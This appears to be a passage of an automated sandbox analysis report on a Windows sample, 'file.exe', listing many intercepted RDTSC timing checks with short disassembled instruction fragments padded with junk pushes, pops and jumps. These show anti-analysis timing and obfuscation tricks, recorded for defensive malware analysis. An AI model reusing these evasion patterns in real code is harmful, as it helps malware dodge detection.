              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDB1A second address: 6CDB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D31E7 second address: 6D31EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D32A6 second address: 6D32AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D8299 second address: 6D82A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6FD3 second address: 6D6FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF8A909BC16h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f popad 0x00000010 jg 00007FF8A909BC41h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6FED second address: 6D6FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7504 second address: 6D752F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC21h 0x00000009 pushad 0x0000000a jmp 00007FF8A909BC1Eh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D769B second address: 6D76A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7B14 second address: 6D7B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF8A909BC29h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7F4B second address: 6D7F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007FF8A95A6CB8h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D80A0 second address: 6D80C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF8A909BC16h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e jmp 00007FF8A909BC1Fh 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D80C8 second address: 6D80CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1C6 second address: 6DE1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FF8A909BC16h 0x0000000d jne 00007FF8A909BC16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1D9 second address: 6DE1DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1DD second address: 6DE1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF8A909BC16h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1F0 second address: 6DE1FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1FA second address: 6DE1FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E33E9 second address: 6E3400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3400 second address: 6E3424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FF8A909BC2Ch 0x0000000e jmp 00007FF8A909BC26h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3424 second address: 6E344D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FF8A95A6CB6h 0x00000009 jmp 00007FF8A95A6CBAh 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FF8A95A6CC2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A625C second address: 6A6262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6262 second address: 6A6266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6266 second address: 68CEEE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jnc 00007FF8A909BC1Ch 0x00000015 call dword ptr [ebp+122D2B84h] 0x0000001b jmp 00007FF8A909BC20h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FF8A909BC20h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a jg 00007FF8A909BC16h 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A634D second address: 6A6352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6768 second address: 6A676C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A681E second address: 6A6822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6822 second address: 6A686F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF8A909BC29h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF8A909BC24h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A686F second address: 6A6879 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6879 second address: 6A687F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A687F second address: 6A6883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6883 second address: 6A68C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FF8A909BC24h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FF8A909BC26h 0x0000001a jl 00007FF8A909BC16h 0x00000020 popad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A68C7 second address: 6A68DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FF8A95A6CB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6A82 second address: 6A6ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FF8A909BC24h 0x00000010 xchg eax, esi 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FF8A909BC18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D31ABh], ecx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jns 00007FF8A909BC1Ch 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6ADB second address: 6A6AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A95A6CC6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6CF5 second address: 6A6D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF8A909BC24h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF8A909BC18h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ecx, 6F0EAAD1h 0x0000002c push 00000004h 0x0000002e mov ch, D5h 0x00000030 movzx ecx, dx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push ebx 0x00000038 pop ebx 0x00000039 jne 00007FF8A909BC16h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6D4B second address: 6A6D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF8A95A6CB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6D55 second address: 6A6D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6D59 second address: 6A6D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jns 00007FF8A95A6CB6h 0x00000012 jmp 00007FF8A95A6CC5h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6D81 second address: 6A6D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A6D87 second address: 6A6D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A70AB second address: 6A70D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FF8A909BC1Ch 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF8A909BC1Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7220 second address: 6A7243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7466 second address: 6A749B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b jmp 00007FF8A909BC20h 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FF8A909BC1Eh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A749B second address: 6A749F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A749F second address: 6A74A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E3753 second address: 6E3758 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E3758 second address: 6E3765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007FF8A909BC1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E3A22 second address: 6E3A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E3A26 second address: 6E3A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E3B80 second address: 6E3B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E3B86 second address: 6E3B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A909BC1Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9090 second address: 6E9094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9094 second address: 6E90AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8A909BC21h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90AB second address: 6E90B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90B1 second address: 6E90B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9683 second address: 6E9699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9699 second address: 6E969D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E969D second address: 6E96B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jo 00007FF8A95A6CF0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FF8A95A6CB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E96B2 second address: 6E96B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9819 second address: 6E981F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E981F second address: 6E982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FF8A909BC1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E982F second address: 6E9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9837 second address: 6E983B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E983B second address: 6E9851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF8A95A6CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 js 00007FF8A95A6CB6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE473 second address: 6EE47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE47A second address: 6EE480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE480 second address: 6EE486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE486 second address: 6EE49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF8A95A6CB8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE5C7 second address: 6EE5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE710 second address: 6EE762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC9h 0x00000009 pop esi 0x0000000a jmp 00007FF8A95A6CC3h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FF8A95A6CBCh 0x00000018 jbe 00007FF8A95A6CB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF8A95A6CC0h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE762 second address: 6EE76E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FF8A909BC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEA27 second address: 6EEA3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF8A95A6CBEh 0x0000000c jnc 00007FF8A95A6CB6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEA3F second address: 6EEA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEB98 second address: 6EEBAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8A95A6CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF8A95A6CB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EECCF second address: 6EECD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EECD3 second address: 6EECD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EECD7 second address: 6EECE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEE21 second address: 6EEE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEE25 second address: 6EEE29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEFBB second address: 6EEFC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EF3F2 second address: 6EF405 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF8A909BC1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EF405 second address: 6EF43F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC9h 0x00000007 jmp 00007FF8A95A6CC9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EF43F second address: 6EF452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b jnp 00007FF8A909BC22h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2AA1 second address: 6F2AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2AA9 second address: 6F2AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2AAF second address: 6F2ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2ABD second address: 6F2AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2AC3 second address: 6F2AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF8A95A6CB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F24C9 second address: 6F2529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF8A909BC1Dh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FF8A909BC1Ah 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FF8A909BC26h 0x0000001e je 00007FF8A909BC1Ch 0x00000024 jmp 00007FF8A909BC24h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2529 second address: 6F252F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F252F second address: 6F2533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
